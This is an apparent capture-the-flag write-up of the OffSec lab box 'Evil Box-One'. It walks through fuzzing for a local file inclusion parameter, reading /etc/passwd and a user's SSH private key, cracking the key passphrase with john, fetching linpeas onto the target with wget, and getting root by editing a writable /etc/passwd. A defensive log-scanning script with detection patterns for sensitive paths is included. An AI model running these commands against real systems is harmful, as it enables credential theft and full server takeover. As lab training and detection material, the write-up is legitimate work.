Today, we tackle Offsec’s Proving Grounds and we’re locked and loaded on Evil Box-One.
This box is vulnerable to Local File Inclusion (LFI), a vulnerability that occurs when an application lets user input influence the file paths used in file inclusion operations without properly sanitizing that input. It allows an attacker to include files elsewhere on the server that were never meant to be reachable through the web application. Soon after exploiting the LFI, we escalate privileges thanks to a misconfiguration in the permissions set on /etc/passwd.
Let’s begin!
I started recon with a script I made named ily.sh. Merry Valentine’s Day I guess. This baby does three things for me once you pass it the target as an argument and, surprisingly, stays loyal:
./ily.sh TARGET-IP
- Starting AutoRecon — An amazing tool used to automate your recon, I highly recommend it.
- Spawns a Python server on port 80 — I do this to view AutoRecon’s results more efficiently. It’s important to spawn this in the same directory used to run AutoRecon.
- Runs FFuF — A fast fuzzing tool I’m using to search for hidden directories.
Got a few hits on some directories, and this one had a message for us in /robots.txt. ha. ok.
In another directory named /secret we find some numbers?
This is all I was able to collect with my initial scan, until I decided to search for hidden directories again. This time I appended /secret to the address in my scan and found /evil.php.
This led me down a rabbit hole because I thought I had to assemble four more directories to spawn the Exodia of URLs for a foothold.
The actual way in starts with fuzzing the parameter name that evil.php expects, using FFuF and a wordlist, which confirms the LFI vulnerability.
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://IP/secret/evil.php?FUZZ=/etc/passwd
This gave us a hit on “command”, so when we plug that into the spot we fuzzed, we receive this gorgeous /etc/passwd page. Within it, you’ll find the username ;)
TARGET-IP/secret/evil.php?command=/etc/passwd
After further enumeration, since we can read other files, we eventually find a private SSH key down below:
http://IP/secret/evil.php?command=/home/mowree/.ssh/id_rsa
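As an added defensive example (not part of the original write-up), the following Python script scans Apache-style access-log lines for requests whose query parameter values reach into the filesystem, which is exactly the trail the two evil.php requests above leave on the web server. The log lines, IPs and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines (Apache combined format; hosts and times are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [14/Feb/2024:10:01:02 +0000] "GET /secret/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Feb/2024:10:01:09 +0000] "GET /secret/evil.php?command=/etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Feb/2024:10:02:31 +0000] "GET /secret/evil.php?command=/home/mowree/.ssh/id_rsa HTTP/1.1" 200 1766 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Feb/2024:10:03:00 +0000] "GET /secret/evil.php?command=..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 10 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Feb/2024:10:04:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Pull the client IP, timestamp, request target and status code out of each line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators that a parameter value is being used as a filesystem path.
TRAVERSAL = re.compile(r'(\.\./|\.\.\\)')
SENSITIVE = re.compile(r'^/?(etc/(passwd|shadow|group)|home/[^/]+/\.ssh/|root/\.ssh/|proc/self/)')


def suspicious_params(target):
    """Return [(param, value)] for query values that look like file path probes."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl already decodes once; decode twice more to catch %252e-style double encoding.
        decoded = unquote(unquote(value))
        if TRAVERSAL.search(decoded) or SENSITIVE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text):
    """Return (ip, ts, status, target, hits) for every request carrying a suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m['target'])
        if hits:
            findings.append((m['ip'], m['ts'], int(m['status']), m['target'], hits))
    return findings


if __name__ == '__main__':
    for ip, ts, status, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} {target} params={hits}")
```

A 200 status on a flagged request is the strongest signal, since it means the include actually returned content; the same check can run over a real log file by replacing SAMPLE_LOG with the file's contents.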
I copied this entire private key and did a few things:
1. Opened an editor and pasted this key into a new file named “id_rsa”.
2. Used ssh2john to convert the key into a hash john can work with, saved as id_rsa.john.
/usr/share/john/ssh2john.py id_rsa > id_rsa.john
3. Ran the newly created file against the rockyou.txt wordlist and cracked the password (the key’s passphrase).
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john
Now we SSH into our user account.
We’re going to use the private key in tandem with the password we cracked. This is different from password authentication: the passphrase only unlocks the key file locally, and we then authenticate to the server by proving possession of the private key without ever transmitting it. We use:
ssh -i id_rsa USER@TARGET-IP
“ssh”: Starts the SSH client and opens a connection to the remote server.
“-i id_rsa”: -i specifies the file containing the private key used for key-based authentication. id_rsa is the name of the file the key is stored in.
“USER”: Specifies the username to log in as on the remote server.
“TARGET-IP”: The IP address of the remote server.
WE GOT USER!!! LET’S GO.
Now that we’re in, I did the following:
1. On the target, I changed directories to /tmp.
2. On my attacking machine, I started a web server in the same directory my linpeas.sh is in.
python3 -m http.server 80
3. Then I pulled it over to the target machine.
#in the /tmp directory of the target machine
wget http://YOUR-IP/linpeas.sh
4. Gave linpeas executable permissions on the target machine.
chmod +x linpeas.sh
5. Finally, we run it!
./linpeas.sh
The output showed that /etc/passwd is writable by my user.
My objective here is to replace the “x” after “root:” with a new password hash of my choosing, then save and close the file. That “x” normally tells the system the real hash lives in /etc/shadow; a hash placed directly in that field of /etc/passwd is used instead.
To generate a new hashed password, and then paste the output into the placeholder mentioned above, I used:
openssl passwd sekkio123
nano /etc/passwd
After that we use:
su root
It’ll prompt you for a password; enter the plaintext you hashed with OpenSSL (sekkio123) and…
WE GOT ROOT!!